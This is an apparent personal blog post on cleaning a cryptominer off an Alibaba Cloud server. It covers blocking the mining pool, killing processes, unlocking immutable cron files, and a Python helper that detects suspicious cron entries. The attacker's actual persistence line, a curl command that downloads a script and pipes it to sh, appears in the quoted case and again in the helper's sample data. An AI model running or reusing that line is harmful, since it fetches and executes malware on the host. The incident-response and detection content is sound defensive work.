Handling a Mining Program Found on an Alibaba Cloud Server

During a routine inspection, one Alibaba Cloud ECS instance was found with abnormally high CPU usage. The process lived in the /tmp directory and its name looked auto-generated. My initial judgement was that the host had been compromised, so I urgently searched Google and found a similar case that had happened on AWS. I forgot to preserve the scene this time, so here is only a brief record:

Case:

I found the solution to removing minerd. I was lucky enough to find the actual script that was used to infect my server. All I had to do was remove the elements placed by this script. On monkeyoto’s suggestion, I blocked all communication with the mining pool server.

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP
iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP

Removed the cron */15 * * * * curl -fsSL https://r.chanstring.com/api/report?pm=0706 | sh from /var/spool/cron/root and /var/spool/cron/crontabs/root
Removed the directory /opt/yam
Removed /root/.ssh/KHK75NEOiq
Deleted the files /opt/minerd and /opt/KHK75NEOiq33
Stopped the minerd process - pkill minerd.
Stopped lady - service lady stop.
I ran ps -eo pcpu,args --sort=-%cpu | head, top -bn2 | sed -n '7,25'p and ps aux | grep minerd after that and the malware was nowhere to be seen.

I still need to figure out how it gained access into the system but I was able to disable it this way.

The specific cleanup steps were as follows:

1. Kick the intruder off

Command format: pkill -kill -t tty
Explanation:
pkill -kill -t    the kick command
tty               the tty of the user being kicked
For example:

pkill -kill -t pts/2

2. Clean house

The process turned out to be relaunched automatically. I immediately checked crontab and, sure enough, found a strange entry. I tried to delete the entry from the crontab, but it could not be saved; the error was similar to:

root@X [/tmp]# crontab -e
crontab: installing new crontab
crontab: error renaming /var/spool/cron/tmp.XXXXDSGEDV to /var/spool/cron/root
rename: Operation not permitted
crontab: edits left in /tmp/crontab.xO3YcB

Solution:

lsattr /var/spool/cron/root
chattr -aui /var/spool/cron/root

3. Change passwords and harden the security settings

Review the sudo users, and review the settings in /etc/ssh/sshd_config.
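As an added example (not from the original post or the quoted case), here is a small Python triage helper that applies the three checks from this write-up to constructed sample output: cron spool files carrying the immutable or append-only attribute that makes crontab -e fail with "Operation not permitted", cron entries that pipe a download into a shell, and processes that are hot or run out of a temp directory. The sample lsattr, crontab and ps text, the path /tmp/ab12cd and the CPU threshold are all assumptions made up for the demo.

```python
import re

# Constructed samples shaped like the post's lsattr / crontab / ps output (not real captures).
SAMPLE_LSATTR = """\
----ia-------e-- /var/spool/cron/root
-------------e-- /var/spool/cron/crontabs/root
"""
SAMPLE_CRON = """\
0 2 * * * /usr/bin/certbot renew --quiet
*/15 * * * * curl -fsSL https://r.chanstring.com/api/report?pm=0706 | sh
"""
SAMPLE_PS = """\
%CPU COMMAND
97.3 /tmp/ab12cd
 0.4 /usr/sbin/sshd -D
"""

PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")
TEMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

def locked_files(lsattr_output):
    """Paths whose attributes include i (immutable) or a (append-only); crontab -e cannot replace them."""
    found = []
    for line in lsattr_output.splitlines():
        parts = line.split(None, 1)
        if len(parts) == 2 and set("ia") & set(parts[0]):
            found.append(parts[1])
    return found

def suspicious_cron_entries(cron_text):
    """Entries that pipe a download into a shell or run a binary from a temp directory."""
    hits = []
    for line in cron_text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        cmd = line.split(None, 1 if line.startswith("@") else 5)[-1]  # drop the schedule fields
        if PIPE_TO_SHELL.search(cmd) or cmd.startswith(TEMP_DIRS):
            hits.append(line)
    return hits

def hot_processes(ps_output, cpu_threshold=50.0):
    """(cpu, args) from `ps -eo pcpu,args --sort=-%cpu` output: above the threshold or run from a temp dir."""
    hits = []
    for line in ps_output.splitlines()[1:]:  # skip the header row
        parts = line.split(None, 1)
        if len(parts) < 2 or not parts[0].replace(".", "", 1).isdigit():
            continue
        if float(parts[0]) >= cpu_threshold or parts[1].startswith(TEMP_DIRS):
            hits.append((float(parts[0]), parts[1]))
    return hits
```

On a real host, feed the functions the output of `lsattr /var/spool/cron/*`, `crontab -l` and `ps -eo pcpu,args --sort=-%cpu`; a file reported by locked_files is the one to fix with chattr -aui before editing the crontab.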


https://ajasonwang.github.io/2017/10/14/aliyun-server-was-hajacked-for-mining-fix/
Author: Wang Jia
Published: October 14, 2017